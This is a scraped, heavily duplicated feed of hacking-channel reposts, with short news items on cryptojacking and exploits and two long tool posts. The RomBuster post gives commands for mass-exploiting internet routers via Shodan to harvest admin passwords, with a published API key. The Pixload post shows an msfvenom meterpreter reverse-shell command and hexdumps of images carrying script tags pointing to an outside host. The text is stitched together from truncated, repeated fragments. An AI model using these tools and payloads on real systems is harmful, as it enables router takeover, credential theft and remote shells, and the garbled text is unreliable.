Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
How hackers are using gamers to become crypto-rich. Researchers discover a hacker has made around $2m so far by giving away cracked versions of games like GTA V laced with cryptojacking malware. They've called it 'Crackonosh' which is from Czech folklore as they think he/she/ are in Czech Republic.
https://external-preview.redd.it/Zaf4ML-bPTqFD_AwDesPWGxiTl-7Rc67W19Md6YPzJU.jpg?width=640&crop=smart&auto=webp&s=21a9249f656a919323243061d9e43c404b608f92 submitted by /u/tides977
[link] [comments]
➖ Sent by @TheFeedReaderBot ➖
How hackers are using gamers to become crypto-rich. Researchers discover a hacker has made around $2m so far by giving away cracked versions of games like GTA V laced with cryptojacking malware. They've called it 'Crackonosh' which is from Czech folklore as they think he/she/ are in Czech Republic.
https://external-preview.redd.it/Zaf4ML-bPTqFD_AwDesPWGxiTl-7Rc67W19Md6YPzJU.jpg?width=640&crop=smart&auto=webp&s=21a9249f656a919323243061d9e43c404b608f92 submitted by /u/tides977
[link] [comments]
➖ Sent by @TheFeedReaderBot ➖
Black Hat Ethical Hacking
30M Dell Devices at Risk for Remote BIOS Attacks, RCE
30M Dell Devices at Risk for Remote BIOS Attacks, RCE
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
xWin Finance Incident: Root Cause Analysis
https://cdn-images-1.medium.com/max/936/1*3PhvRBp-xT-4YQvn1sgWjw.png
Started at Jun-25–2021 12:07:25 AM +UTC, xWin Finance was exploited and the attacker gained about $270k. This incident was due to an…
Continue reading on Medium »
xWin Finance Incident: Root Cause Analysis
https://cdn-images-1.medium.com/max/936/1*3PhvRBp-xT-4YQvn1sgWjw.png
Started at Jun-25–2021 12:07:25 AM +UTC, xWin Finance was exploited and the attacker gained about $270k. This incident was due to an…
Continue reading on Medium »
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Spectra HTB Writeup
https://cdn-images-1.medium.com/max/1712/1*f8776dAwz4U-6bkbQU8_PA.png
Hi everyone, this is my writeup for box “Spectra” found on HackTheBox .
Continue reading on Medium »
Spectra HTB Writeup
https://cdn-images-1.medium.com/max/1712/1*f8776dAwz4U-6bkbQU8_PA.png
Hi everyone, this is my writeup for box “Spectra” found on HackTheBox .
Continue reading on Medium »
RomBuster - A Router Exploitation Tool That Allows To Disclosure Network Router Admin Password
RomBuster is a router exploitation tool that allows to disclosure network router admin password. Features Exploits vulnerabilities in most popular routers such as D-Link, Zyxel, TP-Link and Huawei. Optimized to exploit multiple routers at one time from list with threading enabled. Simple CLI and API usage. Installation pip3 install git+https://github.com/EntySec/RomBuster Basic usage To use RomBuster just type rombuster in your terminal. exploitation tool that allows to disclosure network router admin password. optional arguments: -h, --help show this help message and exit -t, --threads Use threads for fastest work. -o OUTPUT, --output OUTPUT Output result to file. -i INPUT, --input INPUT Input file of addresses. -a ADDRESS, --address ADDRESS Single address. --shodan SHODAN Shodan API key for exploiting devices over Internet. --zoomeye ZOOMEYE ZoomEye API key for exploiting devices over Internet. -p PAGES, --pages PAGES Number of pages you want to get from ZoomEye. ">usage: rombuster -h -t -o OUTPUT -i INPUT -a ADDRESS --shodan SHODAN --zoomeye ZOOMEYE -p PAGESRomBuster is a router exploitation tool that allows to disclosure networkrouter admin password.optional arguments: -h, --help show this help message and exit -t, --threads Use threads for fastest work. -o OUTPUT, --output OUTPUT Output result to file. -i INPUT, --input INPUT Input file of addresses. -a ADDRESS, --address ADDRESS Single address. --shodan SHODAN Shodan API key for exploiting devices over Internet. --zoomeye ZOOMEYE ZoomEye API key for exploiting devices over Internet. -p PAGES, --pages PAGES Number of pages you want to get from ZoomEye. Examples Exploiting single router Let's hack my router just for fun. rombuster -a 192.168.99.1 Exploiting routers from Internet Let's try to use Shodan search engine to exploit routers over Internet, we will use it with -t for fast exploitation. rombuster -t --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD NOTE: Given Shodan API key (PSKINdQe1GyxGgecYz2191H2JoS9qvgD) is my PRO API key, you can use this key or your own, be free to use all our resources for free :) Exploiting routers from input file Let's try to use opened database of routers with -t for fast exploitation. rombuster -t -i routers.txt -o passwords.txt NOTE: It will exploit all routers in routers.txt list by their addresses and save all obtained passwords to passwords.txt. API usage RomBuster also has their own Python API that can be invoked by importing RomBuster to your code. from rombuster import RomBuster Basic functions There are all RomBuster basic functions that can be used to exploit specified router. exploit(address) - Exploit single router by given address. Examples Exploiting single router from rombuster import RomBusterrombuster = RomBuster()creds = rombuster.exploit('192.168.99.100')print(creds) Download RomBuster
Read more...
RomBuster is a router exploitation tool that allows to disclosure network router admin password. Features Exploits vulnerabilities in most popular routers such as D-Link, Zyxel, TP-Link and Huawei. Optimized to exploit multiple routers at one time from list with threading enabled. Simple CLI and API usage. Installation pip3 install git+https://github.com/EntySec/RomBuster Basic usage To use RomBuster just type rombuster in your terminal. exploitation tool that allows to disclosure network router admin password. optional arguments: -h, --help show this help message and exit -t, --threads Use threads for fastest work. -o OUTPUT, --output OUTPUT Output result to file. -i INPUT, --input INPUT Input file of addresses. -a ADDRESS, --address ADDRESS Single address. --shodan SHODAN Shodan API key for exploiting devices over Internet. --zoomeye ZOOMEYE ZoomEye API key for exploiting devices over Internet. -p PAGES, --pages PAGES Number of pages you want to get from ZoomEye. ">usage: rombuster -h -t -o OUTPUT -i INPUT -a ADDRESS --shodan SHODAN --zoomeye ZOOMEYE -p PAGESRomBuster is a router exploitation tool that allows to disclosure networkrouter admin password.optional arguments: -h, --help show this help message and exit -t, --threads Use threads for fastest work. -o OUTPUT, --output OUTPUT Output result to file. -i INPUT, --input INPUT Input file of addresses. -a ADDRESS, --address ADDRESS Single address. --shodan SHODAN Shodan API key for exploiting devices over Internet. --zoomeye ZOOMEYE ZoomEye API key for exploiting devices over Internet. -p PAGES, --pages PAGES Number of pages you want to get from ZoomEye. Examples Exploiting single router Let's hack my router just for fun. rombuster -a 192.168.99.1 Exploiting routers from Internet Let's try to use Shodan search engine to exploit routers over Internet, we will use it with -t for fast exploitation. rombuster -t --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD NOTE: Given Shodan API key (PSKINdQe1GyxGgecYz2191H2JoS9qvgD) is my PRO API key, you can use this key or your own, be free to use all our resources for free :) Exploiting routers from input file Let's try to use opened database of routers with -t for fast exploitation. rombuster -t -i routers.txt -o passwords.txt NOTE: It will exploit all routers in routers.txt list by their addresses and save all obtained passwords to passwords.txt. API usage RomBuster also has their own Python API that can be invoked by importing RomBuster to your code. from rombuster import RomBuster Basic functions There are all RomBuster basic functions that can be used to exploit specified router. exploit(address) - Exploit single router by given address. Examples Exploiting single router from rombuster import RomBusterrombuster = RomBuster()creds = rombuster.exploit('192.168.99.100')print(creds) Download RomBuster
Read more...
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
Crackonosh virus mined $2 million of Monero from 222,000 hacked computers
https://external-preview.redd.it/1U2Z0NDEx-zC19T7Qi5FteP08ucR5yPkVpmxIn-Zbn0.jpg?width=640&crop=smart&auto=webp&s=007ac37414da311d89618893c762c1f7069e2196 submitted by /u/CodePerfect
[link] [comments]
Crackonosh virus mined $2 million of Monero from 222,000 hacked computers
https://external-preview.redd.it/1U2Z0NDEx-zC19T7Qi5FteP08ucR5yPkVpmxIn-Zbn0.jpg?width=640&crop=smart&auto=webp&s=007ac37414da311d89618893c762c1f7069e2196 submitted by /u/CodePerfect
[link] [comments]
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
As usual - weekly cyber news recap:
submitted by /u/caramel_member
[link] [comments]
As usual - weekly cyber news recap:
submitted by /u/caramel_member
[link] [comments]
Hacking Articles Tips Tricks Videos Tutorials
Photo
Black Hat Ethical Hacking
Offensive Security Tool: Pixload
https://www.blackhatethicalhacking.com/wp-content/uploads/2017/11/black-hat-locks-and-electronics.jpg Offensive Security Tool: PixloadPost Views: 107 https://www.blackhatethicalhacking.com/wp-content/uploads/2020/11/BECOME-A-PATRON-AND-UNLOCK-EXCLUSIVE-VIDEOS-8-1-300x120.png Reading Time: 3 Minutes
Offensive Security Tool: Pixload GitHub Link
Pixload – Image Payload Creating tools
Description
Pixload by chinarulezzz, is a set of tools for hiding backdoors creating/injecting payload into images.
The following image types are currently supported: BMP, GIF, JPG, PNG, WebP.
This tool is really powerful, a lot of scenarios can be used, in order to trigger a connection on a server getting a shell while you search for ‘upload’ functions on a website which usually exist, especially when you upload a profile pic, logo etc.. Which will process the injected payload, once the server processes the image to be shown when uploaded, testing the security mechanisms of a WebApp.
about
Useful references for better understanding of
* Bypassing CSP using polyglot JPEGs
* Hacking group using Polyglot images to hide malvertising attacks
* Encoding Web Shells in PNG IDAT chunks
* An XSS on Facebook via PNGs & Wonky Content Types
* Revisiting XSS payloads in PNG IDAT chunks
If you want to encode a payload in such a way that the resulting binary blob is both valid x86 shellcode and a valid image file, I recommend you to look here and here.
msfvenom
If you want to inject a metasploit payload, try something like this:
msfvenom -p php/meterpreter_reverse_tcp \\\\\\\\
LHOST=192.168.0.1
LPORT=31337 -f raw > payload.php # Edit payload.php if need.
./pixload/png.pl -payload "$(cat payload.php)" -output payload.png
SETUP
The following Perl modules are required:
* GD
* Image::ExifTool
* String::CRC32
On
sudo apt install libgd-perl libimage-exiftool-perl libstring-crc32-perl
On
doas pkg install p5-GD p5-Image-ExifTool p5-String-CRC32
On
Docker
docker build -t pixload .
docker run -v "$(pwd):/pixload" -it --rm pixload
TOOLS
bmp.pl
BMP Payload Creator/Injector.
Create a minimal BMP Polyglot Image with custom/default payload, or inject payload into existing image.
Usage
./bmp.pl [-payload 'STRING'] -output payload.bmp
If the output file exists, then the payload will be injected into the
existing file. Else the new one will be created.
Example
./bmp.pl -output payload.bmp
[>| BMP Payload Creator/Injector |]
https://github.com/chinarulezzz/pixload
[>] Generating output file
[✔] File saved to: payload.bmp
[>] Injecting payload into payload.bmp
[✔] Payload was injected successfully
payload.bmp: PC bitmap, OS/2 1.x format, 1 x 1
00000000 42 4d 2f 2a 00 00 00 00 00 00 1a 00 00 00 0c 00 |BM/*............|
00000010 00 00 01 00 01 00 01 00 18 00 00 00 ff 00 2a 2f |..............*/|
00000020 3d 31 3b 3c 73 63 72 69 70 74 20 73 72 63 3d 2f |=1;script src=/|
00000030 2f 6e 6a 69 2e 78 79 7a 3e 3c 2f 73 63 72 69 70 |/nji.xyz>|
00000040 74 3e 3b |t>;|
00000043
gif.pl
GIF Payload Creator/Injector.
Create a minimal GIF Polyglot Image with custom/default payload, or inject payload into existing image. Usage
./gif.pl [-payload 'STRING'] -output payload.gif
If the output file exists, then the payload will be injected into the
existing file. Else the new one will be generated.
Example
./gif.pl -output payload.gif
[>| GIF Payload Creator/Injector |]
https://github.com/chinarulezzz/pixload
[>] Generating output file
[✔] File saved to: payl[...]
Offensive Security Tool: Pixload
https://www.blackhatethicalhacking.com/wp-content/uploads/2017/11/black-hat-locks-and-electronics.jpg Offensive Security Tool: PixloadPost Views: 107 https://www.blackhatethicalhacking.com/wp-content/uploads/2020/11/BECOME-A-PATRON-AND-UNLOCK-EXCLUSIVE-VIDEOS-8-1-300x120.png Reading Time: 3 Minutes
Offensive Security Tool: Pixload GitHub Link
Pixload – Image Payload Creating tools
Description
Pixload by chinarulezzz, is a set of tools for hiding backdoors creating/injecting payload into images.
The following image types are currently supported: BMP, GIF, JPG, PNG, WebP.
This tool is really powerful, a lot of scenarios can be used, in order to trigger a connection on a server getting a shell while you search for ‘upload’ functions on a website which usually exist, especially when you upload a profile pic, logo etc.. Which will process the injected payload, once the server processes the image to be shown when uploaded, testing the security mechanisms of a WebApp.
about
Useful references for better understanding of
pixloadand its use-cases:* Bypassing CSP using polyglot JPEGs
* Hacking group using Polyglot images to hide malvertising attacks
* Encoding Web Shells in PNG IDAT chunks
* An XSS on Facebook via PNGs & Wonky Content Types
* Revisiting XSS payloads in PNG IDAT chunks
If you want to encode a payload in such a way that the resulting binary blob is both valid x86 shellcode and a valid image file, I recommend you to look here and here.
msfvenom
If you want to inject a metasploit payload, try something like this:
msfvenom -p php/meterpreter_reverse_tcp \\\\\\\\
LHOST=192.168.0.1
LPORT=31337 -f raw > payload.php # Edit payload.php if need.
./pixload/png.pl -payload "$(cat payload.php)" -output payload.png
SETUP
The following Perl modules are required:
* GD
* Image::ExifTool
* String::CRC32
On
Debian-basedsystems install these packages:sudo apt install libgd-perl libimage-exiftool-perl libstring-crc32-perl
On
FreeBSDand DragonFlyBSDinstall these packages:doas pkg install p5-GD p5-Image-ExifTool p5-String-CRC32
On
OSXplease refer to this workaround (thnx 2 @iosdec).Docker
docker build -t pixload .
docker run -v "$(pwd):/pixload" -it --rm pixload
TOOLS
bmp.pl
BMP Payload Creator/Injector.
Create a minimal BMP Polyglot Image with custom/default payload, or inject payload into existing image.
Usage
./bmp.pl [-payload 'STRING'] -output payload.bmp
If the output file exists, then the payload will be injected into the
existing file. Else the new one will be created.
Example
./bmp.pl -output payload.bmp
[>| BMP Payload Creator/Injector |]
https://github.com/chinarulezzz/pixload
[>] Generating output file
[✔] File saved to: payload.bmp
[>] Injecting payload into payload.bmp
[✔] Payload was injected successfully
payload.bmp: PC bitmap, OS/2 1.x format, 1 x 1
00000000 42 4d 2f 2a 00 00 00 00 00 00 1a 00 00 00 0c 00 |BM/*............|
00000010 00 00 01 00 01 00 01 00 18 00 00 00 ff 00 2a 2f |..............*/|
00000020 3d 31 3b 3c 73 63 72 69 70 74 20 73 72 63 3d 2f |=1;script src=/|
00000030 2f 6e 6a 69 2e 78 79 7a 3e 3c 2f 73 63 72 69 70 |/nji.xyz>|
00000040 74 3e 3b |t>;|
00000043
gif.pl
GIF Payload Creator/Injector.
Create a minimal GIF Polyglot Image with custom/default payload, or inject payload into existing image. Usage
./gif.pl [-payload 'STRING'] -output payload.gif
If the output file exists, then the payload will be injected into the
existing file. Else the new one will be generated.
Example
./gif.pl -output payload.gif
[>| GIF Payload Creator/Injector |]
https://github.com/chinarulezzz/pixload
[>] Generating output file
[✔] File saved to: payl[...]
Hacking Articles Tips Tricks Videos Tutorials
Black Hat Ethical Hacking Offensive Security Tool: Pixload https://www.blackhatethicalhacking.com/wp-content/uploads/2017/11/black-hat-locks-and-electronics.jpg Offensive Security Tool: PixloadPost Views: 107 https://www.blackhatethicalhacking.com/wp-con…
oad.gif
[>] Injecting payload into payload.gif
[✔] Payload was injected successfully
payload.gif: GIF image data, version 87a, 10799 x 32
00000000 47 49 46 38 37 61 2f 2a 20 00 80 00 00 04 02 04 |GIF87a/* .......|
00000010 00 00 00 2c 00 00 00 00 20 00 20 00 00 02 1e 84 |...,.... . .....|
00000020 8f a9 cb ed 0f a3 9c b4 da 8b b3 de bc fb 0f 86 |................|
00000030 e2 48 96 e6 89 a6 ea ca b6 ee 0b 9b 05 00 3b 2a |.H............;*|
00000040 2f 3d 31 3b 3c 73 63 72 69 70 74 20 73 72 63 3d |/=1;script src=|
00000050 2f 2f 6e 6a 69 2e 78 79 7a 3e 3c 2f 73 63 72 69 |//nji.xyz>|
00000060 70 74 3e 3b |pt>;|
00000064
jpg.pl
JPG Payload Creator/Injector.
Create a minimal JPG Image with custom/default payload, or inject payload into existing image.
There are two ways for injecting:
* inject into COMMENT section
* inject into DQT table
Usage
./jpg.pl -place COM|DQT [-payload 'STRING'] -output payload.jpg
-place COM:
The payload will be injected as a 'COMMENT'.
If the output file exists, then the payload will be injected into the
existing file. Else the new one will be created.
-place DQT:
The payload will be injected into 'DQT table'.
LIMITATION:
1. payload size must not exceed 64 bytes.
2. no injection support, only new file generation.
This is necessary in case the server application processes images and
removes comments, application-specific data, etc.
The data in DQT table must remain intact.
! If the output file exists, then it will be rewritten. !
Example
⦿ DQT
./jpg.pl -place DQT -output payload.jpg
[>| JPEG Payload Creator/Injector |]
https://github.com/chinarulezzz/pixload
[>] Generating output file
[✔] File saved to: payload.jpg
[>] Injecting payload into DQT table
[✔] Payload was injected succesfully
payload.jpg: JPEG image data, progressive, precision 8, 1x1, components 1
00000000 ff d8 ff db 00 43 00 01 01 01 01 01 01 01 01 01 |.....C..........|
00000010 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 |................|
00000020 01 01 01 01 01 01 01 01 3c 73 63 72 69 70 74 20 |........script |
00000030 73 72 63 3d 2f 2f 6e 6a 69 2e 78 79 7a 3e 3c 2f |src=//nji.xyz>|
00000040 73 63 72 69 70 74 3e ff c2 00 0b 08 00 01 00 01 |script>.........|
00000050 01 01 11 00 ff c4 00 14 00 01 00 00 00 00 00 00 |................|
00000060 00 00 00 00 00 00 00 00 00 03 ff da 00 08 01 01 |................|
00000070 00 00 00 01 3f ff d9 |....?..|
00000077
* COMMENT
./jpg.pl -place COM -output payload.jpg
[>| JPEG Payload Creator/Injector |]
https://github.com/chinarulezzz/pixload
[>] Injecting payload into COMMENT
[✔] Payload was injected successfully
payload.jpg: JPEG image data, progressive, precision 8, 1x1, components 1
00000000 ff d8 ff fe 00 21 3c 73 63 72 69 70 74 20 73 72 |.....!script sr|
00000010 63 3d 2f 2f 6e 6a 69 2e 78 79 7a 3e 3c 2f 73 63 |c=//nji.xyz>|
00000020 72 69 70 74 3e ff db 00 43 00 01 01 01 01 01 01 |ript>...C.......|
00000030 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 |................|
00000040 01 01 01 01 01 01 01 01 01 01 01 3c 73 63 72 69 |...........scri|
00000050 70 74 20 73 72 63 3d 2f 2f 6e 6a 69 2e 78 79 7a |pt src=//nji.xyz|
00000060 3e 3c 2f 73 63 72 69 70 74 3e ff c2 00 0b 08 00 |>>......|
00000070 01 00 01 01 01 11 00 ff c4 00 14 00 01 00 00 00 |................|
00000080 00 00 00 00 00 00 00 00 00 00 00 00 03 ff da 00 |................|
00000090 08 01 01 00 00 00 01 3f ff d9 |.......?..|
0000009a
png.pl
PNG Payload Creator/Injector.
Create a PNG Image with custom/default payload, or inject payload into existing image.
The payload is injecting into IDAT data chunks.
Usage
./png.pl [-payload 'STRING'] -output payload.png
If the output file exists, then the payload will be injected into the
existing file. Else the new one will be created.
Example
./png.pl -output payload.png
[>| PNG Payload Creator/Injector |]
https://git[...]
[>] Injecting payload into payload.gif
[✔] Payload was injected successfully
payload.gif: GIF image data, version 87a, 10799 x 32
00000000 47 49 46 38 37 61 2f 2a 20 00 80 00 00 04 02 04 |GIF87a/* .......|
00000010 00 00 00 2c 00 00 00 00 20 00 20 00 00 02 1e 84 |...,.... . .....|
00000020 8f a9 cb ed 0f a3 9c b4 da 8b b3 de bc fb 0f 86 |................|
00000030 e2 48 96 e6 89 a6 ea ca b6 ee 0b 9b 05 00 3b 2a |.H............;*|
00000040 2f 3d 31 3b 3c 73 63 72 69 70 74 20 73 72 63 3d |/=1;script src=|
00000050 2f 2f 6e 6a 69 2e 78 79 7a 3e 3c 2f 73 63 72 69 |//nji.xyz>|
00000060 70 74 3e 3b |pt>;|
00000064
jpg.pl
JPG Payload Creator/Injector.
Create a minimal JPG Image with custom/default payload, or inject payload into existing image.
There are two ways for injecting:
* inject into COMMENT section
* inject into DQT table
Usage
./jpg.pl -place COM|DQT [-payload 'STRING'] -output payload.jpg
-place COM:
The payload will be injected as a 'COMMENT'.
If the output file exists, then the payload will be injected into the
existing file. Else the new one will be created.
-place DQT:
The payload will be injected into 'DQT table'.
LIMITATION:
1. payload size must not exceed 64 bytes.
2. no injection support, only new file generation.
This is necessary in case the server application processes images and
removes comments, application-specific data, etc.
The data in DQT table must remain intact.
! If the output file exists, then it will be rewritten. !
Example
⦿ DQT
./jpg.pl -place DQT -output payload.jpg
[>| JPEG Payload Creator/Injector |]
https://github.com/chinarulezzz/pixload
[>] Generating output file
[✔] File saved to: payload.jpg
[>] Injecting payload into DQT table
[✔] Payload was injected succesfully
payload.jpg: JPEG image data, progressive, precision 8, 1x1, components 1
00000000 ff d8 ff db 00 43 00 01 01 01 01 01 01 01 01 01 |.....C..........|
00000010 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 |................|
00000020 01 01 01 01 01 01 01 01 3c 73 63 72 69 70 74 20 |........script |
00000030 73 72 63 3d 2f 2f 6e 6a 69 2e 78 79 7a 3e 3c 2f |src=//nji.xyz>|
00000040 73 63 72 69 70 74 3e ff c2 00 0b 08 00 01 00 01 |script>.........|
00000050 01 01 11 00 ff c4 00 14 00 01 00 00 00 00 00 00 |................|
00000060 00 00 00 00 00 00 00 00 00 03 ff da 00 08 01 01 |................|
00000070 00 00 00 01 3f ff d9 |....?..|
00000077
* COMMENT
./jpg.pl -place COM -output payload.jpg
[>| JPEG Payload Creator/Injector |]
https://github.com/chinarulezzz/pixload
[>] Injecting payload into COMMENT
[✔] Payload was injected successfully
payload.jpg: JPEG image data, progressive, precision 8, 1x1, components 1
00000000 ff d8 ff fe 00 21 3c 73 63 72 69 70 74 20 73 72 |.....!script sr|
00000010 63 3d 2f 2f 6e 6a 69 2e 78 79 7a 3e 3c 2f 73 63 |c=//nji.xyz>|
00000020 72 69 70 74 3e ff db 00 43 00 01 01 01 01 01 01 |ript>...C.......|
00000030 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 |................|
00000040 01 01 01 01 01 01 01 01 01 01 01 3c 73 63 72 69 |...........scri|
00000050 70 74 20 73 72 63 3d 2f 2f 6e 6a 69 2e 78 79 7a |pt src=//nji.xyz|
00000060 3e 3c 2f 73 63 72 69 70 74 3e ff c2 00 0b 08 00 |>>......|
00000070 01 00 01 01 01 11 00 ff c4 00 14 00 01 00 00 00 |................|
00000080 00 00 00 00 00 00 00 00 00 00 00 00 03 ff da 00 |................|
00000090 08 01 01 00 00 00 01 3f ff d9 |.......?..|
0000009a
png.pl
PNG Payload Creator/Injector.
Create a PNG Image with custom/default payload, or inject payload into existing image.
The payload is injecting into IDAT data chunks.
Usage
./png.pl [-payload 'STRING'] -output payload.png
If the output file exists, then the payload will be injected into the
existing file. Else the new one will be created.
Example
./png.pl -output payload.png
[>| PNG Payload Creator/Injector |]
https://git[...]
Hacking Articles Tips Tricks Videos Tutorials
oad.gif [>] Injecting payload into payload.gif [✔] Payload was injected successfully payload.gif: GIF image data, version 87a, 10799 x 32 00000000 47 49 46 38 37 61 2f 2a 20 00 80 00 00 04 02 04 |GIF87a/* .......| 00000010 00 00 00 2c 00 00 00 00 20…
hub.com/chinarulezzz/pixload
[>] Generating output file
[✔] File saved to: payload.png
[>] Injecting payload into payload.png
[+] Chunk size: 13
[+] Chunk type: IHDR
[+] CRC: fc18eda3
[+] Chunk size: 9
[+] Chunk type: pHYs
[+] CRC: 952b0e1b
[+] Chunk size: 25
[+] Chunk type: IDAT
[+] CRC: c8a288fe
[+] Chunk size: 0
[+] Chunk type: IEND
[>] Inject payload to the new chunk: 'pUnk'
[✔] Payload was injected successfully
payload.png: PNG image data, 32 x 32, 8-bit/color RGB, non-interlaced
00000000 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 |.PNG........IHDR|
00000010 00 00 00 20 00 00 00 20 08 02 00 00 00 fc 18 ed |... ... ........|
00000020 a3 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e |.....pHYs.......|
00000030 c4 01 95 2b 0e 1b 00 00 00 19 49 44 41 54 48 89 |...+......IDATH.|
00000040 ed c1 31 01 00 00 00 c2 a0 f5 4f ed 61 0d a0 00 |..1.......O.a...|
00000050 00 00 6e 0c 20 00 01 c8 a2 88 fe 00 00 00 00 49 |..n. ..........I|
00000060 45 4e 44 ae 42 60 82 00 00 00 00 00 00 00 00 00 |END.B`..........| 00000070 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| * 000000c0 00 1f 70 55 6e 6b 3c 73 63 72 69 70 74 20 73 72 |..pUnkscript sr| 000000d0 63 3d 2f 2f 6e 6a 69 2e 78 79 7a 3e 3c 2f 73 63 |c=//nji.xyz>| 000000e0 72 69 70 74 3e 9d 11 54 97 00 49 45 4e 44 |ript>..T..IEND| 000000ee
webp.pl
WebP Payload Creator/Injector.
Create a WebP Polyglot Image with custom/default payload, or inject payload into existing image.
Usage
./webp.pl [-payload 'STRING'] -output payload.webp
Currently, there is no possibility to inject the payload into an existing
webp image. Only the new (minimal) webp image will be created and your
payload will be injected into.
If the -output argument file exists, the payload will be injected into
the existing image, but this image will be corrupted.
Example
[>| WebP Payload Creator/Injector |]
https://github.com/chinarulezzz/pixload
[>] Generating output file
[✔] File saved to: payload.webp
[>] Injecting payload into payload.webp
[✔] Payload was injected successfully
payload.webp: RIFF (little-endian) data, Web/P image
00000000 52 49 46 46 2f 2a 00 00 57 45 42 50 56 50 38 4c |RIFF/*..WEBPVP8L|
00000010 ff ff ff 00 2f 00 00 00 10 07 10 11 11 88 88 fe |..../...........|
00000020 07 00 2a 2f 3d 31 3b 3c 73 63 72 69 70 74 20 73 |..*/=1;script s|
00000030 72 63 3d 2f 2f 6e 6a 69 2e 78 79 7a 3e 3c 2f 73 |rc=//nji.xyz>|
00000040 63 72 69 70 74 3e 3b |cript>;|
00000047
LICENSE
WTFPL
LEGAL DISCLAIMER
The author does not hold any responsibility for the bad use of this tool, remember that attacking targets without prior consent is illegal and punished by law. Recent Tools* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/06/Vqwdgis-90x90.png Offensive Security Tool: SecretFinder1 week ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/06/3v1wot9-90x90.png Offensive Security Tool: CloudFail2 weeks ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/06/Screenshot_2021-06-04_053854-90x90.png Offensive Security Tool: Pacu – The Amazon Web Services Exploitation Framework3 weeks ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/05/Screenshot_20210527_200634-90x90.png OSINT Tool: LinkedIn Scraper4 weeks ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/05/sna-768x373-1-90x90.png Offensive Security Tool: Snallygaster1 month ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/05/image_2021-05-14_115500-90x90.png Offensive Security Tool: Breacher1 month ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/05/image_2021-05-07_124858-90x90.png Offensive Security Tool: EyeWitness2 months ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/04/Selection_017-90x90.png Offensive Security Tool: SSHPry2.02 months ago
* https://[...]
[>] Generating output file
[✔] File saved to: payload.png
[>] Injecting payload into payload.png
[+] Chunk size: 13
[+] Chunk type: IHDR
[+] CRC: fc18eda3
[+] Chunk size: 9
[+] Chunk type: pHYs
[+] CRC: 952b0e1b
[+] Chunk size: 25
[+] Chunk type: IDAT
[+] CRC: c8a288fe
[+] Chunk size: 0
[+] Chunk type: IEND
[>] Inject payload to the new chunk: 'pUnk'
[✔] Payload was injected successfully
payload.png: PNG image data, 32 x 32, 8-bit/color RGB, non-interlaced
00000000 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 |.PNG........IHDR|
00000010 00 00 00 20 00 00 00 20 08 02 00 00 00 fc 18 ed |... ... ........|
00000020 a3 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e |.....pHYs.......|
00000030 c4 01 95 2b 0e 1b 00 00 00 19 49 44 41 54 48 89 |...+......IDATH.|
00000040 ed c1 31 01 00 00 00 c2 a0 f5 4f ed 61 0d a0 00 |..1.......O.a...|
00000050 00 00 6e 0c 20 00 01 c8 a2 88 fe 00 00 00 00 49 |..n. ..........I|
00000060 45 4e 44 ae 42 60 82 00 00 00 00 00 00 00 00 00 |END.B`..........| 00000070 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| * 000000c0 00 1f 70 55 6e 6b 3c 73 63 72 69 70 74 20 73 72 |..pUnkscript sr| 000000d0 63 3d 2f 2f 6e 6a 69 2e 78 79 7a 3e 3c 2f 73 63 |c=//nji.xyz>| 000000e0 72 69 70 74 3e 9d 11 54 97 00 49 45 4e 44 |ript>..T..IEND| 000000ee
webp.pl
WebP Payload Creator/Injector.
Create a WebP Polyglot Image with custom/default payload, or inject payload into existing image.
Usage
./webp.pl [-payload 'STRING'] -output payload.webp
Currently, there is no possibility to inject the payload into an existing
webp image. Only the new (minimal) webp image will be created and your
payload will be injected into.
If the -output argument file exists, the payload will be injected into
the existing image, but this image will be corrupted.
Example
[>| WebP Payload Creator/Injector |]
https://github.com/chinarulezzz/pixload
[>] Generating output file
[✔] File saved to: payload.webp
[>] Injecting payload into payload.webp
[✔] Payload was injected successfully
payload.webp: RIFF (little-endian) data, Web/P image
00000000 52 49 46 46 2f 2a 00 00 57 45 42 50 56 50 38 4c |RIFF/*..WEBPVP8L|
00000010 ff ff ff 00 2f 00 00 00 10 07 10 11 11 88 88 fe |..../...........|
00000020 07 00 2a 2f 3d 31 3b 3c 73 63 72 69 70 74 20 73 |..*/=1;script s|
00000030 72 63 3d 2f 2f 6e 6a 69 2e 78 79 7a 3e 3c 2f 73 |rc=//nji.xyz>|
00000040 63 72 69 70 74 3e 3b |cript>;|
00000047
LICENSE
WTFPL
LEGAL DISCLAIMER
The author does not hold any responsibility for the bad use of this tool, remember that attacking targets without prior consent is illegal and punished by law. Recent Tools* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/06/Vqwdgis-90x90.png Offensive Security Tool: SecretFinder1 week ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/06/3v1wot9-90x90.png Offensive Security Tool: CloudFail2 weeks ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/06/Screenshot_2021-06-04_053854-90x90.png Offensive Security Tool: Pacu – The Amazon Web Services Exploitation Framework3 weeks ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/05/Screenshot_20210527_200634-90x90.png OSINT Tool: LinkedIn Scraper4 weeks ago
